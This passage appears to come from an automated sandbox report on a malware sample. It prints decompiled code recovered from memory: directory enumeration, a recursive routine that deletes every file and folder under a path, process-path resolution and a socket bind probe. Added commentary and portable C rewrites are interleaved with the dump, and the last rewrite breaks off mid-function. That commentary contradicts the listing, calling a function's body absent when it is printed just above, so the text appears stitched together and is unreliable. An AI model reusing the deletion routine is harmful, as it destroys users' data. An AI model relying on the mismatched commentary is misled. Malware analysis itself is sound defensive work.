                                                                                    											break;
                                                                                    										} else {
                                                                                    											_t87 = _t87 + 4;
                                                                                    											_t66 = _t66 + 4;
                                                                                    											if(_t97 != 0) {
                                                                                    												continue;
                                                                                    											} else {
                                                                                    												goto L18;
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    									L20:
                                                                                    									if(_t67 != 0) {
                                                                                    										 *(_t100 + _t84) = _v1648.dwFileAttributes & 0x00000010;
                                                                                    										_t101 = _t100 + 1;
                                                                                    										_t106 = 2 + lstrlenW( &(_v1648.cFileName)) * 2;
                                                                                    										E04EDDC90(_t101 + _t84,  &(_v1648.cFileName), _t106);
                                                                                    										_t102 = _t101 + _t106;
                                                                                    										_t104 = _v1656;
                                                                                    										_t109 = _t109 + 0xc;
                                                                                    										 *((intOrPtr*)(_t102 + _t84)) = _v1648.nFileSizeHigh;
                                                                                    										 *((intOrPtr*)(_t102 + _t84 + 4)) = _v1648.nFileSizeLow;
                                                                                    										 *((intOrPtr*)(_t102 + _t84 + 8)) = _v1648.ftLastWriteTime;
                                                                                    										 *((intOrPtr*)(_t102 + _t84 + 0xc)) = _v1624;
                                                                                    										_t100 = _t102 + 0x10;
                                                                                    									}
                                                                                    									goto L22;
                                                                                    								}
                                                                                    								asm("sbb eax, eax");
                                                                                    								_t67 = _t66 | 0x00000001;
                                                                                    								goto L20;
                                                                                    							}
                                                                                    							goto L22;
                                                                                    						}
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t57 = _t56 | 0x00000001;
                                                                                    						goto L12;
                                                                                    						L22:
                                                                                    					} while (FindNextFileW(_v1660,  &_v1648) != 0);
                                                                                    					_push(_t87);
                                                                                    					_push(0x3f);
                                                                                    					_push(_t100);
                                                                                    					E04EB1C60( *((intOrPtr*)(_v1664 + 4)));
                                                                                    					LocalFree(_t84);
                                                                                    					FindClose(_v1660);
                                                                                    					return E04ED572E(_v12 ^ _t107, _t84);
                                                                                    				} else {
                                                                                    					_push(_t85);
                                                                                    					_push(0x3f);
                                                                                    					_push(1);
                                                                                    					_v1649 = 0x69;
                                                                                    					E04EB1C60( *((intOrPtr*)(_t83 + 4)));
                                                                                    					return E04ED572E(_v12 ^ _t107,  &_v1649);
                                                                                    				}
                                                                                    			}

                                                                                    0x04eb4c20
                                                                                    0x04eb4c29
                                                                                    0x04eb4c30
                                                                                    0x04eb4c3a
                                                                                    0x04eb4c47
                                                                                    0x04eb4c4c
                                                                                    0x04eb4c53
                                                                                    0x04eb4c5a
                                                                                    0x04eb4c60
                                                                                    0x04eb4c66
                                                                                    0x04eb4c77
                                                                                    0x04eb4c7d
                                                                                    0x04eb4c86
                                                                                    0x04eb4cc3
                                                                                    0x04eb4cc5
                                                                                    0x04eb4cca
                                                                                    0x04eb4cd0
                                                                                    0x04eb4cd0
                                                                                    0x04eb4cd8
                                                                                    0x04eb4cda
                                                                                    0x04eb4ce4
                                                                                    0x04eb4cf0
                                                                                    0x04eb4cf0
                                                                                    0x04eb4cf2
                                                                                    0x04eb4cf7
                                                                                    0x04eb4d00
                                                                                    0x04eb4d00
                                                                                    0x04eb4d06
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4d0b
                                                                                    0x04eb4d22
                                                                                    0x04eb4d22
                                                                                    0x04eb4d0d
                                                                                    0x04eb4d0d
                                                                                    0x04eb4d11
                                                                                    0x04eb4d15
                                                                                    0x00000000
                                                                                    0x04eb4d17
                                                                                    0x04eb4d17
                                                                                    0x04eb4d1a
                                                                                    0x04eb4d20
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4d20
                                                                                    0x04eb4d15
                                                                                    0x04eb4d2b
                                                                                    0x04eb4d2d
                                                                                    0x04eb4d33
                                                                                    0x04eb4d38
                                                                                    0x04eb4d40
                                                                                    0x04eb4d40
                                                                                    0x04eb4d46
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4d4b
                                                                                    0x04eb4d62
                                                                                    0x04eb4d62
                                                                                    0x04eb4d4d
                                                                                    0x04eb4d4d
                                                                                    0x04eb4d51
                                                                                    0x04eb4d55
                                                                                    0x00000000
                                                                                    0x04eb4d57
                                                                                    0x04eb4d57
                                                                                    0x04eb4d5a
                                                                                    0x04eb4d60
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4d60
                                                                                    0x04eb4d55
                                                                                    0x04eb4d6b
                                                                                    0x04eb4d6d
                                                                                    0x04eb4d77
                                                                                    0x04eb4d81
                                                                                    0x04eb4d88
                                                                                    0x04eb4d9b
                                                                                    0x04eb4da6
                                                                                    0x04eb4da8
                                                                                    0x04eb4dae
                                                                                    0x04eb4db1
                                                                                    0x04eb4dba
                                                                                    0x04eb4dc4
                                                                                    0x04eb4dce
                                                                                    0x04eb4dd2
                                                                                    0x04eb4dd2
                                                                                    0x00000000
                                                                                    0x04eb4d6d
                                                                                    0x04eb4d66
                                                                                    0x04eb4d68
                                                                                    0x00000000
                                                                                    0x04eb4d68
                                                                                    0x00000000
                                                                                    0x04eb4d2d
                                                                                    0x04eb4d26
                                                                                    0x04eb4d28
                                                                                    0x00000000
                                                                                    0x04eb4dd5
                                                                                    0x04eb4de8
                                                                                    0x04eb4df0
                                                                                    0x04eb4df7
                                                                                    0x04eb4df9
                                                                                    0x04eb4dfe
                                                                                    0x04eb4e06
                                                                                    0x04eb4e12
                                                                                    0x04eb4e2a
                                                                                    0x04eb4c88
                                                                                    0x04eb4c88
                                                                                    0x04eb4c92
                                                                                    0x04eb4c94
                                                                                    0x04eb4c97
                                                                                    0x04eb4c9e
                                                                                    0x04eb4cb3
                                                                                    0x04eb4cb3

                                                                                    APIs
                                                                                    • wsprintfW.USER32 ref: 04EB4C60
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 04EB4C77
                                                                                    • LocalAlloc.KERNEL32(00000040,00002800), ref: 04EB4CBD
                                                                                    • LocalReAlloc.KERNEL32(00000000,000023F0,00000042), ref: 04EB4CEA
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB4D82
                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 04EB4DE2
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000001,0000003F), ref: 04EB4E06
                                                                                    • FindClose.KERNEL32(?), ref: 04EB4E12
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FindLocal$AllocFile$CloseFirstFreeNextlstrlenwsprintf
                                                                                    • String ID: %s\*.*$i
                                                                                    • API String ID: 4084865168-1236837797
                                                                                    • Opcode ID: 55309b33a16ac2d22a2c1d77b60d4777682f520887ce076acb3ed6d104f04eb6
                                                                                    • Instruction ID: 3344b84bbc0bc3f054a320f1416c719464cc2c03bda455b9be7160d191f0a5b8
                                                                                    • Opcode Fuzzy Hash: 55309b33a16ac2d22a2c1d77b60d4777682f520887ce076acb3ed6d104f04eb6
                                                                                    • Instruction Fuzzy Hash: D6511871A00118AFD720DF64DC40BEAB7B9FF94318F4041E5E949D7245D732AA94CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 55%
                                                                                    			E04EB4E30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, WCHAR* _a4) {
                                                                                    				signed int _v12;
                                                                                    				short _v1056;
                                                                                    				short _v2096;
                                                                                    				struct _WIN32_FIND_DATAW _v2688;
                                                                                    				intOrPtr _v2692;
                                                                                    				signed int _t26;
                                                                                    				signed int _t33;
                                                                                    				signed int _t34;
                                                                                    				signed int _t41;
                                                                                    				signed int _t42;
                                                                                    				void* _t54;
                                                                                    				intOrPtr* _t56;
                                                                                    				intOrPtr* _t59;
                                                                                    				void* _t63;
                                                                                    				void* _t64;
                                                                                    				intOrPtr _t65;
                                                                                    				intOrPtr _t66;
                                                                                    				void* _t68;
                                                                                    				WCHAR* _t70;
                                                                                    				signed int _t71;
                                                                                    				void* _t72;
                                                                                    				void* _t73;
                                                                                    
                                                                                    				_t26 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v12 = _t26 ^ _t71;
                                                                                    				_t70 = _a4;
                                                                                    				_t68 = wsprintfW;
                                                                                    				_v2692 = __ecx;
                                                                                    				wsprintfW( &_v2096, L"%s\\*.*", _t70);
                                                                                    				_t73 = _t72 + 0xc;
                                                                                    				_t54 = FindFirstFileW( &_v2096,  &_v2688);
                                                                                    				if(_t54 != 0xffffffff) {
                                                                                    					do {
                                                                                    						_t56 = ".";
                                                                                    						_t33 =  &(_v2688.cFileName);
                                                                                    						while(1) {
                                                                                    							_t63 =  *_t33;
                                                                                    							if(_t63 !=  *_t56) {
                                                                                    								break;
                                                                                    							}
                                                                                    							if(_t63 == 0) {
                                                                                    								L7:
                                                                                    								_t34 = 0;
                                                                                    							} else {
                                                                                    								_t66 =  *((intOrPtr*)(_t33 + 2));
                                                                                    								_t10 = _t56 + 2; // 0x2e0000
                                                                                    								if(_t66 !=  *_t10) {
                                                                                    									break;
                                                                                    								} else {
                                                                                    									_t33 = _t33 + 4;
                                                                                    									_t56 = _t56 + 4;
                                                                                    									if(_t66 != 0) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										goto L7;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							L9:
                                                                                    							if(_t34 != 0) {
                                                                                    								_t59 = L"..";
                                                                                    								_t41 =  &(_v2688.cFileName);
                                                                                    								while(1) {
                                                                                    									_t64 =  *_t41;
                                                                                    									if(_t64 !=  *_t59) {
                                                                                    										break;
                                                                                    									}
                                                                                    									if(_t64 == 0) {
                                                                                    										L15:
                                                                                    										_t42 = 0;
                                                                                    									} else {
                                                                                    										_t65 =  *((intOrPtr*)(_t41 + 2));
                                                                                    										_t13 = _t59 + 2; // 0x2e
                                                                                    										if(_t65 !=  *_t13) {
                                                                                    											break;
                                                                                    										} else {
                                                                                    											_t41 = _t41 + 4;
                                                                                    											_t59 = _t59 + 4;
                                                                                    											if(_t65 != 0) {
                                                                                    												continue;
                                                                                    											} else {
                                                                                    												goto L15;
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    									L17:
                                                                                    									if(_t42 != 0) {
                                                                                    										_push( &(_v2688.cFileName));
                                                                                    										_push(_t70);
                                                                                    										_push(L"%s\\%s");
                                                                                    										_push( &_v1056);
                                                                                    										if((_v2688.dwFileAttributes & 0x00000010) == 0) {
                                                                                    											wsprintfW();
                                                                                    											_t73 = _t73 + 0x10;
                                                                                    											DeleteFileW( &_v1056);
                                                                                    										} else {
                                                                                    											wsprintfW();
                                                                                    											_t73 = _t73 + 0x10;
                                                                                    											E04EB4E30(_t54, _v2692, _t68, _t70,  &_v1056);
                                                                                    										}
                                                                                    									}
                                                                                    									goto L21;
                                                                                    								}
                                                                                    								asm("sbb eax, eax");
                                                                                    								_t42 = _t41 | 0x00000001;
                                                                                    								goto L17;
                                                                                    							}
                                                                                    							goto L21;
                                                                                    						}
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t34 = _t33 | 0x00000001;
                                                                                    						goto L9;
                                                                                    						L21:
                                                                                    					} while (FindNextFileW(_t54,  &_v2688) != 0);
                                                                                    					FindClose(_t54);
                                                                                    					RemoveDirectoryW(_t70);
                                                                                    					return E04ED572E(_v12 ^ _t71);
                                                                                    				} else {
                                                                                    					return E04ED572E(_v12 ^ _t71);
                                                                                    				}
                                                                                    			}


                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
                                                                                    • String ID: %s\%s$%s\*.*
                                                                                    • API String ID: 2470771279-1665845743
                                                                                    • Opcode ID: 6c2ca7c667a9b43576e10c3a6ab71cfca60179c407284e23a8eb153d7927641a
                                                                                    • Instruction ID: ee10f37f5f31d8e19ebdd6e9b14a264cb5cd1408b12e15d3bc4747289a494dc3
                                                                                    • Opcode Fuzzy Hash: 6c2ca7c667a9b43576e10c3a6ab71cfca60179c407284e23a8eb153d7927641a
                                                                                    • Instruction Fuzzy Hash: DC41D8716001189ADB10EF74DD41AFBB3ADFF55318F40A4A5D945D7185EB32FA44CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 79%
                                                                                    			// Analyst annotation (inferred from the API calls below, not from symbols): resolves the NT-style
                                                                                    			// image path of the process handle passed in __ecx into a drive-letter path written to __edx.
                                                                                    			E04EC4560(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				short _v12;
                                                                                    				short _v16;
                                                                                    				char _v536;
                                                                                    				WCHAR* _v540;
                                                                                    				WCHAR* _v544;
                                                                                    				signed int _t35;
                                                                                    				char* _t41;
                                                                                    				WCHAR* _t46;
                                                                                    				short _t49;
                                                                                    				short _t50;
                                                                                    				WCHAR* _t51;
                                                                                    				long _t53;
                                                                                    				signed int _t56;
                                                                                    				signed int _t63;
                                                                                    				long _t64;
                                                                                    				WCHAR* _t68;
                                                                                    				long _t70;
                                                                                    				WCHAR* _t74;
                                                                                    				signed int _t76;
                                                                                    				void* _t98;
                                                                                    				WCHAR* _t101;
                                                                                    				void* _t104;
                                                                                    				long _t105;
                                                                                    				WCHAR* _t106;
                                                                                    				signed int _t107;
                                                                                    				void* _t108;
                                                                                    				void* _t109;
                                                                                    				void* _t110;
                                                                                    				void* _t111;
                                                                                    				long _t115;
                                                                                    
                                                                                    				_t98 = __edi;
                                                                                    				_t35 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t35 ^ _t107;
                                                                                    				_t104 = __ecx;
                                                                                    				_v540 = __edx;
                                                                                    				E04EDDAD0(__edi, __edx, 0, 0x208); // helper used like memset: clear the 0x208-byte output buffer
                                                                                    				E04EDDAD0(_t98,  &_v536, 0, 0x208); // and the local 0x104-WCHAR path buffer
                                                                                    				_t109 = _t108 + 0x18;
                                                                                    				_t41 =  &_v536;
                                                                                    				__imp__GetProcessImageFileNameW(_t104, _t41, 0x104); // yields an NT device path (\Device\HarddiskVolumeN\...), not a drive-letter path
                                                                                    				if(_t41 == 0) {
                                                                                    					L16:
                                                                                    					__eflags = _v8 ^ _t107;
                                                                                    					return E04ED572E(_v8 ^ _t107);
                                                                                    				} else {
                                                                                    					_push(_t98);
                                                                                    					_t105 = GetLogicalDriveStringsW(0, 0); // zero-length buffer: returns the buffer size required for the drive list
                                                                                    					_t115 = _t105;
                                                                                    					if(_t115 == 0) {
                                                                                    						L15:
                                                                                    						goto L16;
                                                                                    					} else {
                                                                                    						_t5 = _t105 + 1; // 0x1
                                                                                    						_push(__ebx);
                                                                                    						_push( ~(_t115 > 0) | _t5 * 0x00000002);
                                                                                    						_t46 = E04ED5785( ~(_t115 > 0) | _t5 * 0x00000002, _t105, _t115);
                                                                                    						_t86 = 2 + _t105 * 2;
                                                                                    						_t74 = _t46;
                                                                                    						_v544 = _t74;
                                                                                    						E04EDDAD0(GetLogicalDriveStringsW, _t74, 0, 2 + _t105 * 2);
                                                                                    						_t110 = _t109 + 0x10;
                                                                                    						if(GetLogicalDriveStringsW(_t105, _t74) != 0) {
                                                                                    							_t49 =  *0x4efddb0; // 0x3a0020: the two WCHARs ' ' and ':'
                                                                                    							_v16 = _t49;        // _v16 holds L" :"; the space is overwritten with each drive letter in the loop
                                                                                    							_t50 =  *0x4efddb4; // 0x0
                                                                                    							_push(0x208);
                                                                                    							_v12 = _t50;        // terminating NUL, so &_v16 is the string L"X:"
                                                                                    							_t51 = E04ED5785(_t86, _t105, __eflags);
                                                                                    							_t111 = _t110 + 4;
                                                                                    							_t101 = _t51;
                                                                                    							_t106 = _t74;
                                                                                    							while(1) {
                                                                                    								_t87 =  *_t106;
                                                                                    								_v16 =  *_t106;
                                                                                    								_t53 = QueryDosDeviceW( &_v16, _t101, 0x104); // map L"X:" to its \Device\... target name
                                                                                    								__eflags = _t53;
                                                                                    								if(_t53 != 0) {
                                                                                    									goto L8;
                                                                                    								}
                                                                                    								_t64 = GetLastError();
                                                                                    								__eflags = _t64 - 0x7a;
                                                                                    								if(_t64 == 0x7a) { // 0x7a == ERROR_INSUFFICIENT_BUFFER: retry with a reallocated buffer
                                                                                    									E04ED573F(_t101);
                                                                                    									_t87 =  ~(__eflags > 0) | 2;
                                                                                    									_push( ~(__eflags > 0) | 2);
                                                                                    									_t68 = E04ED5785( ~(__eflags > 0) | 2, _t106, __eflags);
                                                                                    									_t111 = _t111 + 8;
                                                                                    									_t101 = _t68;
                                                                                    									_t70 = QueryDosDeviceW( &_v16, _t101, 1);
                                                                                    									__eflags = _t70;
                                                                                    									if(_t70 != 0) {
                                                                                    										goto L8;
                                                                                    									}
                                                                                    								}
                                                                                    								L14:
                                                                                    								E04ED573F(_v544);
                                                                                    								E04ED573F(_t101);
                                                                                    								goto L15;
                                                                                    								L8:
                                                                                    								_t76 = lstrlenW(_t101); // length of this drive's device name
                                                                                    								_t56 = E04EDF1BA(_t76, _t87, _t106,  &_v536, _t101, _t76); // likely a length-limited string compare of the image path prefix against the device name (0 == match)
                                                                                    								_t111 = _t111 + 0xc;
                                                                                    								__eflags = _t56;
                                                                                    								if(_t56 == 0) {
                                                                                    									wsprintfW(_v540, L"%s%s",  &_v16,  &_v536 + _t76 * 2); // output = L"X:" + the part of the path after the device prefix
                                                                                    									_t111 = _t111 + 0x10;
                                                                                    								} else {
                                                                                    									asm("o16 nop [eax+eax]");
                                                                                    									do { // no match: advance past the current NUL-terminated drive string
                                                                                    										_t63 =  *_t106 & 0x0000ffff;
                                                                                    										_t106 =  &(_t106[1]);
                                                                                    										__eflags = _t63;
                                                                                    									} while (_t63 != 0);
                                                                                    									__eflags =  *_t106 - _t63;
                                                                                    									if( *_t106 != _t63) { // not yet at the double NUL that ends the list: try the next drive
                                                                                    										continue;
                                                                                    									}
                                                                                    								}
                                                                                    								goto L14;
                                                                                    							}
                                                                                    						} else {
                                                                                    							E04ED573F(_t74);
                                                                                    							return E04ED572E(_v8 ^ _t107);
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,?,?,?,?,74E069A0), ref: 04EC45AE
                                                                                    • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,74E069A0), ref: 04EC45C7
                                                                                    • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,74E069A0), ref: 04EC460A
                                                                                    • QueryDosDeviceW.KERNEL32(?,00000000,00000104,?,?,?,?,00000000,?,?,?,?,?,74E069A0), ref: 04EC4664
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,74E069A0), ref: 04EC466A
                                                                                    • QueryDosDeviceW.KERNEL32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 04EC46A6
                                                                                    • lstrlenW.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,74E069A0), ref: 04EC46AD
                                                                                    • wsprintfW.USER32 ref: 04EC46FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DeviceDriveLogicalQueryStrings$ErrorFileImageLastNameProcesslstrlenwsprintf
                                                                                    • String ID: %s%s
                                                                                    • API String ID: 1509662898-3252725368
                                                                                    • Opcode ID: 56d0e68a0f2a8283231a963239c2a241cf63ef1e73cce3cfb37c73977dfd9716
                                                                                    • Instruction ID: a1b007cfbe311bbc757a8a9410eace3e34ee777a016c60a521e9d66fa25284a2
                                                                                    • Opcode Fuzzy Hash: 56d0e68a0f2a8283231a963239c2a241cf63ef1e73cce3cfb37c73977dfd9716
                                                                                    • Instruction Fuzzy Hash: 5541D971E41208BBEB20EB65DC45FBEB7ACDF44708F101569E90AE7180FA75AE028B55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
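The API sequence listed above (GetProcessImageFileNameW, then GetLogicalDriveStringsW and QueryDosDeviceW for each drive letter, then wsprintfW with "%s%s") is the standard way to turn the native path that GetProcessImageFileName returns (\Device\HarddiskVolumeN\...) back into a drive-letter path. The decompiled body of that function is not part of this excerpt, so the following is an added example, not the sample's code: a portable rewrite of the device-to-drive join step over a constructed mapping table, plus, under _WIN32, enumeration of the live table with the same two APIs. The table entries, the paths and the names native_to_dos, build_devmap and DevMap are all constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* One entry of the device-name -> drive-letter table. */
typedef struct {
    char device[260];   /* e.g. "\Device\HarddiskVolume3" (QueryDosDevice output) */
    char drive[3];      /* e.g. "C:" */
} DevMap;

/* Rewrite a native NT path to a DOS path using the table (the "%s%s" step).
 * Returns 1 and fills out on success, 0 if no entry matches or out is too small. */
int native_to_dos(const char *native, const DevMap *map, size_t n,
                  char *out, size_t outlen)
{
    for (size_t i = 0; i < n; i++) {
        size_t len = strlen(map[i].device);
        if (strncmp(native, map[i].device, len) != 0)
            continue;
        /* The match must end at a separator or at end of string, otherwise
         * "\Device\HarddiskVolume3" would also claim "\Device\HarddiskVolume30". */
        if (native[len] != '\\' && native[len] != '\0')
            continue;
        if (snprintf(out, outlen, "%s%s", map[i].drive, native + len) >= (int)outlen)
            return 0;
        return 1;
    }
    return 0;
}

#ifdef _WIN32
/* Populate the table from the live system: GetLogicalDriveStrings for the
 * letters, QueryDosDevice for the device name behind each one. */
size_t build_devmap(DevMap *map, size_t cap)
{
    char drives[512];
    DWORD got = GetLogicalDriveStringsA(sizeof drives, drives);
    size_t n = 0;
    if (got == 0 || got >= sizeof drives)
        return 0;
    for (const char *d = drives; *d && n < cap; d += strlen(d) + 1) {
        char letter[3] = { d[0], ':', '\0' };   /* "C:\" -> "C:" for QueryDosDevice */
        if (QueryDosDeviceA(letter, map[n].device, sizeof map[n].device) == 0)
            continue;
        memcpy(map[n].drive, letter, sizeof letter);
        n++;
    }
    return n;
}
#endif

/* Constructed table standing in for QueryDosDevice output on a two-volume host. */
static const DevMap sample_map[] = {
    { "\\Device\\HarddiskVolume3",  "C:" },
    { "\\Device\\HarddiskVolume30", "D:" },
};

int main(void)
{
    char out[512];
    const char *p = "\\Device\\HarddiskVolume30\\Tools\\x.exe";
    if (native_to_dos(p, sample_map, 2, out, sizeof out))
        printf("%s -> %s\n", p, out);
    return 0;
}
```

The boundary check after the prefix match is the part that is easy to get wrong in a hand-rolled version: volume numbers are not fixed-width, so a bare prefix comparison mis-maps paths on hosts with more than nine volumes.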

                                                                                    C-Code - Quality: 38%
                                                                                    			E04ED2030(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                                                    				signed int _v8;
                                                                                    				signed short _v36;
                                                                                    				intOrPtr _v40;
                                                                                    				signed int _t19;
                                                                                    				intOrPtr _t21;
                                                                                    				long _t25;
                                                                                    				long _t30;
                                                                                    				signed short _t36;
                                                                                    				intOrPtr* _t38;
                                                                                    				void* _t49;
                                                                                    				long _t53;
                                                                                     				signed int _t54;
                                                                                     				intOrPtr* _t52; // used below but left undeclared by the decompiler: address string or L"0.0.0.0"
                                                                                     				long _t29;      // likewise: sockaddr length handed to bind
                                                                                    
                                                                                    				_t19 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t19 ^ _t54;
                                                                                    				_t49 = __ecx;
                                                                                    				_t36 = 0;
                                                                                    				_t38 = _a4;
                                                                                     				if(_t38 == 0 ||  *_t38 == 0) {
                                                                                     					_t21 = 0;
                                                                                     				} else {
                                                                                     					_t3 = _t36 + 1; // 0x1
                                                                                     					_t21 = _t3;
                                                                                     				}
                                                                                     				_v40 = _t21; // 1 when a non-empty address string was supplied, else 0
                                                                                     				// The decompiler dropped the condition of this ternary; it is the same
                                                                                     				// non-empty test as above, so a missing argument falls back to "0.0.0.0".
                                                                                     				_t52 = _v40 != 0 ? _t38 : L"0.0.0.0";
                                                                                     				_v36 = 0;
                                                                                     				_v36 = E04ECCC60(_t52, _t52);
                                                                                     				_t25 = E04ECCD10(_t36, 0, _t49, _t52,  &_v36); // builds a sockaddr at &_v36; _v36 is its sa_family
                                                                                     				if(_t25 == 0) {
                                                                                     					L11:
                                                                                     					__imp__#111(); // WS2_32 ordinal 111: WSAGetLastError (see APIs below)
                                                                                     					 *((intOrPtr*)(_t49 + 0x58)) = 3; // status 3: address could not be parsed or socket() failed
                                                                                     					SetLastError(_t25);
                                                                                     					goto L12;
                                                                                     				} else {
                                                                                     					_t25 = _v36 & 0x0000ffff;
                                                                                     					__imp__#23(_t25, 1, 6); // WS2_32 ordinal 23: socket(family, SOCK_STREAM, IPPROTO_TCP)
                                                                                     					_t53 = _t25;
                                                                                     					if(_t53 == 0xffffffff) { // INVALID_SOCKET
                                                                                     						goto L11;
                                                                                     					}
                                                                                     					// Condition dropped by the decompiler; the two constants are sizeof(sockaddr_in)
                                                                                     					// and sizeof(sockaddr_in6), so the test is on the address family in _v36.
                                                                                     					_t29 = _v36 == 2 ? 0x10 : 0x1c; // AF_INET ? 16 : 28
                                                                                     					_t30 =  &_v36;
                                                                                     					__imp__#2(_t53, _t30, _t29); // WS2_32 ordinal 2: bind(s, &sockaddr, len)
                                                                                     					if(_t30 == 0xffffffff) { // SOCKET_ERROR
                                                                                     						__imp__#111(); // WSAGetLastError
                                                                                     						 *((intOrPtr*)(_t49 + 0x58)) = 4; // status 4: bind() failed
                                                                                     						SetLastError(_t30);
                                                                                     						__imp__#3(_t53); // WS2_32 ordinal 3: closesocket
                                                                                     					} else {
                                                                                     						 *((intOrPtr*)(_t49 + 0x40)) = E04ECCFF0(_t53); // two values read back from the bound socket
                                                                                     						 *((intOrPtr*)(_t49 + 0x44)) = E04ECD060(_t53);
                                                                                     						if(_v40 != _t36) {
                                                                                     							E04ED1C80( &_v36, _t49 + 0x5c); // keep the sockaddr in the object when an address was given
                                                                                     						}
                                                                                     						_t36 = 1;
                                                                                     						__imp__#3(_t53); // closesocket: the bound socket is released right after the values are read
                                                                                     					}
                                                                                     					L12:
                                                                                     					return E04ED572E(_v8 ^ _t54); // stack-cookie check
                                                                                    				}
                                                                                     			}

                                                                                     Per-line instruction addresses of the decompiled listing above span 0x04ed2036 to 0x04ed213f.

                                                                                    APIs
                                                                                    • socket.WS2_32(?,00000001,00000006), ref: 04ED2099
                                                                                    • bind.WS2_32(00000000,00000002,0000001C), ref: 04ED20BE
                                                                                    • closesocket.WS2_32(00000000), ref: 04ED20F4
                                                                                    • WSAGetLastError.WS2_32 ref: 04ED20FC
                                                                                    • SetLastError.KERNEL32 ref: 04ED210A
                                                                                    • closesocket.WS2_32(00000000), ref: 04ED2111
                                                                                    • WSAGetLastError.WS2_32 ref: 04ED2119
                                                                                    • SetLastError.KERNEL32 ref: 04ED2127
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$closesocket$bindsocket
                                                                                    • String ID: 0.0.0.0
                                                                                    • API String ID: 3276209097-3771769585
                                                                                    • Opcode ID: acda53ea136b3be697395b0041ce0fc9e93779e62c2dfd14ba6a2d3fcd1ebae5
                                                                                    • Instruction ID: e19b1e6db5343fd9f94122f971dede38389e3a16375bf625617a0d53a875c860
                                                                                    • Opcode Fuzzy Hash: acda53ea136b3be697395b0041ce0fc9e93779e62c2dfd14ba6a2d3fcd1ebae5
                                                                                    • Instruction Fuzzy Hash: AF318171A002189BDB14DFB5D845AEE77B8FF48315F00516AEE06D3180DB75EC46C7A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
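E04ED2030 above parses an address string (falling back to "0.0.0.0"), opens a TCP socket for that address family, binds it with a 16- or 28-byte sockaddr, reads two values back from the bound socket, closes it, and records status 3 or 4 together with WSAGetLastError on failure. The following is an added example, not code from the sample or from the report, that reproduces that probe with POSIX sockets instead of Winsock so it runs on Linux. The PROBE_* codes, the ProbeResult struct and the choice to read back the kernel-assigned port with getsockname are assumptions of this example; what E04ECCFF0 and E04ECD060 actually read from the socket is not visible in the listing.

```c
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Outcome codes; 3 and 4 mirror the values the sample stores at +0x58. */
enum { PROBE_OK = 0, PROBE_BAD_ADDR = 2, PROBE_SOCKET_FAILED = 3, PROBE_BIND_FAILED = 4 };

typedef struct {
    int status;           /* one of the PROBE_* codes */
    int err;              /* errno when status != PROBE_OK */
    int family;           /* AF_INET or AF_INET6 */
    unsigned short port;  /* port the kernel assigned on success */
} ProbeResult;

/* Parse addr (NULL or "" falls back to "0.0.0.0", as in the sample), derive the
 * address family from it, attempt a TCP bind on an ephemeral port, read back
 * the assigned port and close the socket again. */
ProbeResult probe_bind(const char *addr)
{
    ProbeResult r = { PROBE_OK, 0, AF_INET, 0 };
    struct sockaddr_storage ss;
    struct sockaddr_in *s4 = (struct sockaddr_in *)&ss;
    struct sockaddr_in6 *s6 = (struct sockaddr_in6 *)&ss;
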